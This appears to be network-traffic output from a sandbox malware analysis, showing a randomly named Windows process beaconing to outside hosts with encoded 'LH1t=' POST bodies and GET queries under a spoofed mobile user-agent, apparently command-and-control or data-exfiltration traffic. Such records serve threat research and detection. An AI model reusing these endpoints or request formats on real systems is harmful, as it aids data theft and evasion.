LH1t=UJ7yBSMLB2pzNId1zfiZAeD7SUGvzwZS+7qOgo/TsOMiXbU7oZqsiQc0oqrGVWkSO+EbZJfRlQSb5RD8jh5HFcXeA+DdfYvcKmkqhaq9+2UxduWnqycPGhJyZkhCEMnK4V6JHpgqO0NQmQhJhDFkG5OEAWpmPlxUBdd5PSDQzh1r1WK0NqNtX05OehIqLQGpNxm4zTDv+wRe35oni6qHqjB4zj9d

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49967	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:00.493447065 CET	1784	OUT	POST /c9n1/ HTTP/1.1 Host: www.sido247.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.sido247.pro Referer: http://www.sido247.pro/c9n1/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 55 4a 37 79 42 53 4d 4c 42 32 70 7a 4e 49 64 31 7a 66 69 5a 41 65 44 37 53 55 47 76 7a 77 5a 53 2b 37 71 4f 67 6f 2f 54 73 4e 73 69 58 70 73 37 35 49 71 73 6a 51 63 30 30 36 72 48 56 57 6c 41 4f 2b 63 66 5a 4a 54 42 6c 53 71 62 35 7a 37 38 7a 55 5a 48 50 63 58 65 4d 65 44 51 41 49 75 57 4b 6d 55 75 68 61 36 39 2b 32 55 78 64 74 4f 6e 38 54 63 50 45 68 4a 7a 4a 30 68 47 58 63 6e 69 34 55 53 7a 48 70 6b 51 4e 45 74 51 6d 77 52 4a 6a 52 74 6b 4c 35 4f 52 4e 32 70 75 50 6c 39 48 42 5a 39 66 50 53 33 2b 7a 6e 46 72 35 58 72 67 66 62 78 4c 4d 48 78 58 59 6d 6b 64 4b 69 4f 71 43 53 47 53 76 52 62 2b 39 46 35 65 6e 36 56 6d 6a 6f 47 4f 2f 55 4e 6a 6a 45 38 32 4d 76 64 4c 78 73 30 51 51 45 47 79 2f 67 63 64 77 44 30 6b 53 67 78 48 35 41 78 70 50 72 37 52 6f 6c 4e 41 39 54 6f 63 50 6c 4e 65 70 44 67 37 58 4d 34 69 57 37 74 55 4c 52 4c 50 31 2f 59 4c 32 32 53 6d 47 75 46 53 33 44 45 66 63 6e 4f 6e 6d 41 62 59 5a 4e 4c 42 47 5a 64 71 31 6a 41 59 58 54 6d 4f 37 58 2f 47 4b 50 38 4c 59 76 67 6d 62 [TRUNCATED] Data Ascii: LH1t=UJ7yBSMLB2pzNId1zfiZAeD7SUGvzwZS+7qOgo/TsNsiXps75IqsjQc006rHVWlAO+cfZJTBlSqb5z78zUZHPcXeMeDQAIuWKmUuha69+2UxdtOn8TcPEhJzJ0hGXcni4USzHpkQNEtQmwRJjRtkL5ORN2puPl9HBZ9fPS3+znFr5XrgfbxLMHxXYmkdKiOqCSGSvRb+9F5en6VmjoGO/UNjjE82MvdLxs0QQEGy/gcdwD0kSgxH5AxpPr7RolNA9TocPlNepDg7XM4iW7tULRLP1/YL22SmGuFS3DEfcnOnmAbYZNLBGZdq1jAYXTmO7X/GKP8LYvgmb1ziPotGUbOQQ12yBGu9oNyTL4tUNfAtNSiR4vpEssblffvU9azUSvMANsts7s1flb8gjY3HP3F3yLx8ag03dwKahzXOn5yAbsWb4SANN3nUH9rFXbcV8r5GOp5Y3qXutjVf4Z8GOPrjilVrv/mmWTKdca+X8p1xrIpJlOay2vRZNKRMmU57/4f70lZuEBj7W08uOq6Xk9NNH69X9Ux+u9dXjMfAg62YjigVDjzBnzL9yhjk395tNeqAD/ekTm8QHJ0klFlnsJ8dFjEwMJkPtRnFfG0UKxrciyoyWm5ICuOKVclEVR9Kx1AL79LF889KotFgxBjfZi/uBSSExjiUwl4DwvRufFfyEK5iYnZytlfz8c1UjBkR3fJPfJUVaJ8TpXImxtqgOkfpEuxvagDTbl9fm0NInIp1pqeui151fttco7iN5pl0kySdohJ3qB6fxYSnIi00R8BjUYciU2f2S8//PYnbK1yjD37pgqDS6VqRx/9lSvpf0n4Mq1O7ykHW4rEqn/hWufc/Y54m6UXBtF2CskrQJjFB2RdrQrFTXycccayq1SSs9KTQ5bANtrPn0LF0GmYUbydCQc+QG2JM6h4coARjQCM4Q7sRDe8jSRkS6X4S7n4Yc4sUytGEZTfWYihGcxUOrVoQEWvaybQjWbs3oHU+Zs3Vskm [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49981	84.32.84.32	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:03.123367071 CET	500	OUT	GET /c9n1/?LH1t=ZLTSClZbaB8MHbtnh5rLJMnGH02tmwkswIWWkpezpf5gYt1N/Ne/nHxaobrQcFYzFcMUaIPRgQqR+CHajlNKC8baT6T5RaLhCCkZuf2y0AAyYdjagCc/QRszW3FQa/qOkg==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.sido247.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:41:03.601814985 CET	1236	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 15:41:03 GMT Content-Type: text/html Content-Length: 9973 Connection: close Vary: Accept-Encoding Server: hcdn alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 3617e10a02f7e3145b0128900b576aaf-bos-edge3 Expires: Fri, 10 Jan 2025 15:41:02 GMT Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED] Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
Jan 10, 2025 16:41:03.601852894 CET	1236	IN	Data Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63 Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
Jan 10, 2025 16:41:03.601878881 CET	1236	IN	Data Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
Jan 10, 2025 16:41:03.601902962 CET	1236	IN	Data Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
Jan 10, 2025 16:41:03.601919889 CET	1236	IN	Data Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61 Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
Jan 10, 2025 16:41:03.601936102 CET	1236	IN	Data Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
Jan 10, 2025 16:41:03.601953030 CET	1236	IN	Data Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)\|\|56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
Jan 10, 2025 16:41:03.601969957 CET	1236	IN	Data Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
Jan 10, 2025 16:41:03.601989031 CET	424	IN	Data Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78 Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49984	3.33.130.190	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:08.813323021 CET	765	OUT	POST /lnrv/ HTTP/1.1 Host: www.emirates-visa.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.emirates-visa.net Referer: http://www.emirates-visa.net/lnrv/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 51 68 4b 33 66 6d 48 49 68 35 44 72 4f 76 4f 30 75 77 41 59 6a 34 6d 38 6f 35 74 77 46 30 4c 77 55 31 4d 74 69 35 41 4f 46 58 53 75 36 5a 35 53 58 6f 6a 76 42 59 76 68 39 52 39 65 4d 6e 51 5a 42 4d 33 50 56 75 6f 2f 34 6f 72 76 7a 48 6d 2b 6a 4d 76 45 4e 6c 46 6f 50 2f 57 41 47 64 57 31 71 57 4a 2b 6f 41 4c 4c 66 33 5a 74 68 4d 75 36 33 54 52 62 50 57 69 4d 76 52 30 73 72 62 30 71 35 35 62 6b 54 5a 75 63 64 51 6b 37 6b 46 35 7a 65 47 64 43 67 55 4f 6c 65 73 43 31 4b 77 63 47 69 53 52 34 63 6e 39 5a 34 43 52 35 42 6d 68 55 69 49 31 52 74 55 73 35 33 34 42 44 6b 47 31 6e 6d 30 51 52 62 58 45 3d Data Ascii: LH1t=QhK3fmHIh5DrOvO0uwAYj4m8o5twF0LwU1Mti5AOFXSu6Z5SXojvBYvh9R9eMnQZBM3PVuo/4orvzHm+jMvENlFoP/WAGdW1qWJ+oALLf3ZthMu63TRbPWiMvR0srb0q55bkTZucdQk7kF5zeGdCgUOlesC1KwcGiSR4cn9Z4CR5BmhUiI1RtUs534BDkG1nm0QRbXE=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49985	3.33.130.190	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:11.361896038 CET	785	OUT	POST /lnrv/ HTTP/1.1 Host: www.emirates-visa.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.emirates-visa.net Referer: http://www.emirates-visa.net/lnrv/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 51 68 4b 33 66 6d 48 49 68 35 44 72 66 2b 2b 30 6f 58 63 59 6c 59 6d 6a 78 5a 74 77 4f 55 4c 38 55 31 41 74 69 34 45 6b 46 45 36 75 36 35 4a 53 55 70 6a 76 4d 34 76 68 70 42 39 62 43 48 51 6b 42 4e 4c 48 56 73 73 2f 34 6f 50 76 7a 48 57 2b 6a 37 37 46 4e 31 46 71 48 66 57 4f 43 64 57 31 71 57 4a 2b 6f 45 72 78 66 33 42 74 68 2f 47 36 32 32 39 59 48 32 69 4c 6d 78 30 73 67 37 31 43 35 35 62 61 54 63 50 35 64 53 63 37 6b 41 56 7a 64 58 64 46 75 55 4f 6a 54 4d 43 67 4f 53 74 31 75 43 56 49 56 68 56 6b 2b 42 73 42 45 51 51 2b 34 71 39 58 75 55 45 53 33 37 70 31 68 78 6f 50 38 58 41 68 46 41 53 31 72 57 43 32 4c 52 71 65 56 33 68 67 4f 34 53 57 41 59 46 59 Data Ascii: LH1t=QhK3fmHIh5Drf++0oXcYlYmjxZtwOUL8U1Ati4EkFE6u65JSUpjvM4vhpB9bCHQkBNLHVss/4oPvzHW+j77FN1FqHfWOCdW1qWJ+oErxf3Bth/G6229YH2iLmx0sg71C55baTcP5dSc7kAVzdXdFuUOjTMCgOSt1uCVIVhVk+BsBEQQ+4q9XuUES37p1hxoP8XAhFAS1rWC2LRqeV3hgO4SWAYFY
Jan 10, 2025 16:41:11.816989899 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49986	3.33.130.190	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:13.910116911 CET	1802	OUT	POST /lnrv/ HTTP/1.1 Host: www.emirates-visa.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.emirates-visa.net Referer: http://www.emirates-visa.net/lnrv/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 51 68 4b 33 66 6d 48 49 68 35 44 72 66 2b 2b 30 6f 58 63 59 6c 59 6d 6a 78 5a 74 77 4f 55 4c 38 55 31 41 74 69 34 45 6b 46 45 69 75 36 6f 70 53 57 4b 4c 76 44 59 76 68 31 78 39 61 43 48 51 31 42 4d 6a 35 56 73 68 64 34 71 48 76 77 6b 65 2b 76 65 48 46 48 31 46 71 4c 2f 57 50 47 64 57 67 71 58 6c 45 6f 41 50 78 66 33 42 74 68 36 43 36 67 54 52 59 42 32 69 4d 76 52 30 67 72 62 31 35 35 34 2f 56 54 63 44 48 64 44 38 37 6e 68 35 7a 53 46 31 46 6d 55 4f 68 64 73 44 6c 4f 53 68 71 75 43 5a 45 56 6c 64 4b 2b 42 55 42 48 46 31 30 74 2b 78 79 32 31 74 73 34 49 70 43 68 44 38 74 69 46 45 51 59 67 43 6a 38 51 65 56 63 42 69 78 66 32 6b 53 62 66 71 59 47 49 74 52 2b 54 46 51 45 57 50 33 6a 2b 54 32 51 69 5a 50 5a 53 32 46 48 68 2f 48 47 56 36 5a 46 64 69 67 77 54 58 34 76 6a 6c 37 34 56 55 2f 74 35 31 41 35 43 39 72 41 38 62 76 73 75 4a 59 68 67 63 54 4f 47 77 41 5a 2b 66 65 35 54 30 67 37 46 56 6d 64 31 2f 70 73 30 5a 52 68 58 48 6d 44 31 45 48 62 56 32 4f 47 75 38 48 30 38 42 36 44 67 2f 43 79 [TRUNCATED] Data Ascii: LH1t=QhK3fmHIh5Drf++0oXcYlYmjxZtwOUL8U1Ati4EkFEiu6opSWKLvDYvh1x9aCHQ1BMj5Vshd4qHvwke+veHFH1FqL/WPGdWgqXlEoAPxf3Bth6C6gTRYB2iMvR0grb1554/VTcDHdD87nh5zSF1FmUOhdsDlOShquCZEVldK+BUBHF10t+xy21ts4IpChD8tiFEQYgCj8QeVcBixf2kSbfqYGItR+TFQEWP3j+T2QiZPZS2FHh/HGV6ZFdigwTX4vjl74VU/t51A5C9rA8bvsuJYhgcTOGwAZ+fe5T0g7FVmd1/ps0ZRhXHmD1EHbV2OGu8H08B6Dg/Cy+powh+kIw8SSIqZq9Qa4OKzxTzVZ+VNzM7ZV4I5XuR6i4xmmm8PXJPf1ykyXA5jqR5C93cY/Xz2qDZfwXfGQICwEt9rRs+84G8oE2CRcIXDoD2wfXO0ZJ0vkNiXGF+DQdqu4XTf1Ok3K4ro4oIGvZt1YPfVYaFBNaXjweX47UtqSHTltRC+7ZmIyBJkMuBnU7gG7+5u9xKKCtb3+EzsmcFO4+sxjV17vZ2JrNbOa59LIUkXcEy4n87zqiFQyIThAsVgpjXFr5GmvwyEdYNiQsqMDb5uQBLdE7AtikF66RPB8OrE7aFM8Nw/caakjVx1eMJ5XnwitLoWu+haF1nTqpe33hDPts5hX7qkPz9O4XsNNCHo1LOSdmcfrYHn2z9ss+atYuIq99f88Ec3lxV2XKHSnO9wnVjcQvVaBlPJxfUNfJB8PE2Yv6S19Uk5UPZCwXb4HtsisPQWUtRcbciiMdMXuD8+jAix2Vruj3tAbb9EmshhZPJTh+TT/EP8y4VDJlvY0oL/3hVOI0RP0kRh49PPOuJphmJ81/qgtKNkkH3gpyIWRnVjgtR6Zo6o1OhK4ROiJWl+aAc4gloK3twiC0NrSQRZ9/N+16fXKmvFjJ6bN21GpVdJjUdqYppv/fJd3mWAlT8flS8nKu5VZwEWBUXxllPvwmhWo0U [TRUNCATED]
Jan 10, 2025 16:41:14.344687939 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49987	3.33.130.190	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:16.467077971 CET	506	OUT	GET /lnrv/?fpJ=16J40rx8bHP8SV&LH1t=djiXcRDNleKKZNnl5ghctoCIjpFqMVObRlELgbdbd2yUtNpQZcruA+vypD1zHFI3XNbubPNky5LKo0aujLSTAktuQb20GKiolDp1oULDeQwsrOm+8EdlBmeZsA4zougguw== HTTP/1.1 Host: www.emirates-visa.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:41:22.935368061 CET	392	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 15:41:22 GMT content-length: 271 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 70 4a 3d 31 36 4a 34 30 72 78 38 62 48 50 38 53 56 26 4c 48 31 74 3d 64 6a 69 58 63 52 44 4e 6c 65 4b 4b 5a 4e 6e 6c 35 67 68 63 74 6f 43 49 6a 70 46 71 4d 56 4f 62 52 6c 45 4c 67 62 64 62 64 32 79 55 74 4e 70 51 5a 63 72 75 41 2b 76 79 70 44 31 7a 48 46 49 33 58 4e 62 75 62 50 4e 6b 79 35 4c 4b 6f 30 61 75 6a 4c 53 54 41 6b 74 75 51 62 32 30 47 4b 69 6f 6c 44 70 31 6f 55 4c 44 65 51 77 73 72 4f 6d 2b 38 45 64 6c 42 6d 65 5a 73 41 34 7a 6f 75 67 67 75 77 3d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fpJ=16J40rx8bHP8SV&LH1t=djiXcRDNleKKZNnl5ghctoCIjpFqMVObRlELgbdbd2yUtNpQZcruA+vypD1zHFI3XNbubPNky5LKo0aujLSTAktuQb20GKiolDp1oULDeQwsrOm+8EdlBmeZsA4zougguw=="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49988	91.195.240.123	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:41:27.996700048 CET	741	OUT	POST /bzmd/ HTTP/1.1 Host: www.gisxj.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.gisxj.sbs Referer: http://www.gisxj.sbs/bzmd/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 63 76 57 59 30 73 55 37 4c 42 69 77 4c 35 38 78 4b 34 6c 70 75 2f 44 57 64 4b 44 42 36 33 52 2b 33 44 41 75 62 38 44 51 59 43 63 67 77 52 45 6f 65 63 76 4c 65 4d 65 64 57 34 75 47 5a 39 53 32 38 73 41 4b 48 4d 6a 66 66 46 44 65 62 33 53 78 4b 32 2f 79 55 54 72 46 72 55 34 45 34 38 62 79 47 72 66 47 42 4b 45 5a 79 55 65 7a 49 6c 6e 44 66 65 68 69 52 37 69 66 55 64 57 49 5a 76 51 6d 42 76 38 75 5a 36 73 4a 6a 31 32 65 65 6e 47 6e 6d 35 4b 4c 6b 35 2f 37 69 4b 38 69 35 79 6b 63 6e 59 6c 36 32 69 4a 44 47 46 47 4a 54 76 49 53 47 74 2b 49 47 63 7a 43 51 57 64 33 53 77 4e 36 44 2b 68 37 55 5a 34 3d Data Ascii: LH1t=cvWY0sU7LBiwL58xK4lpu/DWdKDB63R+3DAub8DQYCcgwREoecvLeMedW4uGZ9S28sAKHMjffFDeb3SxK2/yUTrFrU4E48byGrfGBKEZyUezIlnDfehiR7ifUdWIZvQmBv8uZ6sJj12eenGnm5KLk5/7iK8i5ykcnYl62iJDGFGJTvISGt+IGczCQWd3SwN6D+h7UZ4=
